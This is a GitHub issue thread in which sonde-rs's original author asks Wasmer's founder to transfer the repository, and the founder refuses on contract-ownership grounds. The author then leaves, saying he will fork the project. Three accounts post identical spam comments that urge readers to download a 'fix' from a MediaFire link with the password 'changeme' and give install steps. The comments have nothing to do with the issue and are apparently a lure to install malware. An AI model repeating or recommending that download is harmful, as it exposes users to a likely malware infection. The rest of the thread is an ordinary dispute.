### ISSUE TITLE
Transfer ownership to me

### ISSUE THREAD

**Issue by Hywan** [wasmerio/sonde-rs#3]
Hello @syrusakbary,

I'm the author and only contributor to this project. Wasmer doesn't seem to care about the maintenance of this project (3 years since my last commit). People are raising bugs and opening PR (#1, #2). I believe this project deserves more love.

The license sets the copyright to myself:

https://github.com/wasmerio/sonde-rs/blob/a7dd1832ce393e4729059a04b12780b677df279b/LICENSE.md?plain=1#L1

The copyright extends to today.
 
Can you please transfer the ownership of this repository to myself please, so that I can take care of maintaining the project?

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syrusakbary** [comment]
Hi Ivan,

I have checked and this library was created in working hours as a employee/contractor of Wasmer and for the specific needs of the company. This means that Wasmer is the rightful proprietor of the software (feel free to check the "4.2. Ownership of Contractor Work Product." of our contract agreement if you have questions). I have no idea why the LICENSE file stated otherwise, but I corrected it so there's no confusion on this.

In any case, of course I'd be happy for you to maintain the project and provide the love it deserves.
If interested let me know and I'll add you as maintainer of the repo

**Comment by Hywan** [comment]
For the context: https://mnt.io/articles/i-leave-wasmer/.

You are so hilarious. How can you imagine I can work for someone like you _again_?

Wasmer is not using this project anymore, https://github.com/search?q=repo%3Awasmerio%2Fwasmer%20sonde&type=code.

I'll simply fork the project. I hope you can change, one day.

**Comment by syrusakbary** [comment]
As in any open-source project, as long as its [LICENSE](https://github.com/wasmerio/sonde-rs/blob/master/LICENSE.md) is respected, you can fork and use the project.

I'll close the issue, as it seems there's no interest in maintaining this repo, and the software ownership will continue being part of Wasmer
